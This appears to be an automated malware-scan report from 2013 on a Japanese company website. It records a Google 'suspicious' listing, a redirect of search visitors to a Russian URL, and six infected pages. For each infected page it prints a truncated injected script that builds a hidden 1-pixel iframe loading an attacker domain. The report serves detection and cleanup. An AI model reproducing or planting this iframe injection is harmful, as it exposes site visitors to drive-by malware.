Online Malware Scanner report for www.eishin-maoyi.co.jp

New scan:

www.eishin-maoyi.co.jp

(cached results from Mon Jul 15 06:33:50 2013 rescan)

Website Malware
Cleaning & Monitoring

Malware cleaning service from eVuln team.

  • Website cleaning
  • Redirects removal
  • Log files inspection
  • Reason eliminating
  • Blacklists removal
  • One year monitoring
  • Repeated fixing

website(s)

$119.00

Malicious/Suspicious/Total urls checked
6/0/10
6 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "www.eishin-maoyi.co.jp" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here are our suggestions how to fix this.
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://lutkyhyx.ru/count28.php
10 websites infected.

The website "www.eishin-maoyi.co.jp" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Setup daily monitoring of www.eishin-maoyi.co.jp

Paste the following HTML code anywhere into "www.eishin-maoyi.co.jp" website.

eVuln.com

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=www.eishin-maoyi.co.jp

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://www.eishin-maoyi.co.jp/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: www.eishin-maoyi.co.jp
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Jul 2013 03:33:52 GMT
Location: http://lutkyhyx.ru/count28.php
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://www.eishin-maoyi.co.jp/
200 OK
Content-Length: 5256
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: fuhxodyz.ru

function zzzfff() { var l = document.createElement('iframe'); l.src = 'http://fuhxodyz.ru/count1.php'; l.style.position = 'absolute'; l.style.border = '0'; l.style.height = '1px'; l.style.width = '1px'; l.style.left = '1px'; l.style.top = '1px'; if (!document.getElementById('l')) { document.write('<div id=\'l\'></div>'); document.getElementById('l').appendChild(l); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); docume
...[639 bytes skipped]...

http://www.eishin-maoyi.co.jp/index.html
200 OK
Content-Length: 5256
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: fuhxodyz.ru

function zzzfff() { var l = document.createElement('iframe'); l.src = 'http://fuhxodyz.ru/count1.php'; l.style.position = 'absolute'; l.style.border = '0'; l.style.height = '1px'; l.style.width = '1px'; l.style.left = '1px'; l.style.top = '1px'; if (!document.getElementById('l')) { document.write('<div id=\'l\'></div>'); document.getElementById('l').appendChild(l); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); docume
...[639 bytes skipped]...

http://www.eishin-maoyi.co.jp/2.html
200 OK
Content-Length: 5863
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: fuhxodyz.ru

function zzzfff() { var l = document.createElement('iframe'); l.src = 'http://fuhxodyz.ru/count1.php'; l.style.position = 'absolute'; l.style.border = '0'; l.style.height = '1px'; l.style.width = '1px'; l.style.left = '1px'; l.style.top = '1px'; if (!document.getElementById('l')) { document.write('<div id=\'l\'></div>'); document.getElementById('l').appendChild(l); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); docume
...[639 bytes skipped]...

http://www.eishin-maoyi.co.jp/3.html
200 OK
Content-Length: 6569
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: fuhxodyz.ru

function zzzfff() { var l = document.createElement('iframe'); l.src = 'http://fuhxodyz.ru/count1.php'; l.style.position = 'absolute'; l.style.border = '0'; l.style.height = '1px'; l.style.width = '1px'; l.style.left = '1px'; l.style.top = '1px'; if (!document.getElementById('l')) { document.write('<div id=\'l\'></div>'); document.getElementById('l').appendChild(l); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); docume
...[639 bytes skipped]...

http://www.eishin-maoyi.co.jp/4.html
200 OK
Content-Length: 4891
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: fuhxodyz.ru

function zzzfff() { var l = document.createElement('iframe'); l.src = 'http://fuhxodyz.ru/count1.php'; l.style.position = 'absolute'; l.style.border = '0'; l.style.height = '1px'; l.style.width = '1px'; l.style.left = '1px'; l.style.top = '1px'; if (!document.getElementById('l')) { document.write('<div id=\'l\'></div>'); document.getElementById('l').appendChild(l); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); docume
...[639 bytes skipped]...

http://www.eishin-maoyi.co.jp/5.html
200 OK
Content-Length: 9043
Content-Type: text/html
malicious
Malicious code found. Script contains blacklisted domain: fuhxodyz.ru

function zzzfff() { var l = document.createElement('iframe'); l.src = 'http://fuhxodyz.ru/count1.php'; l.style.position = 'absolute'; l.style.border = '0'; l.style.height = '1px'; l.style.width = '1px'; l.style.left = '1px'; l.style.top = '1px'; if (!document.getElementById('l')) { document.write('<div id=\'l\'></div>'); document.getElementById('l').appendChild(l); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); docume
...[639 bytes skipped]...

http://www.eishin-maoyi.co.jp/test404page.js
404 Not Found
Content-Length: 283
Content-Type: text/html
clean
http://www.eishin-maoyi.co.jp/image2/p4_1d.jpg
200 OK
Content-Length: 73454
Content-Type: image/jpeg
clean
http://www.eishin-maoyi.co.jp/image2/p3_1d.jpg
200 OK
Content-Length: 33479
Content-Type: image/jpeg
clean
http://www.eishin-maoyi.co.jp/image2/p3_3d.jpg
200 OK
Content-Length: 54265
Content-Type: image/jpeg
clean
Infected sites found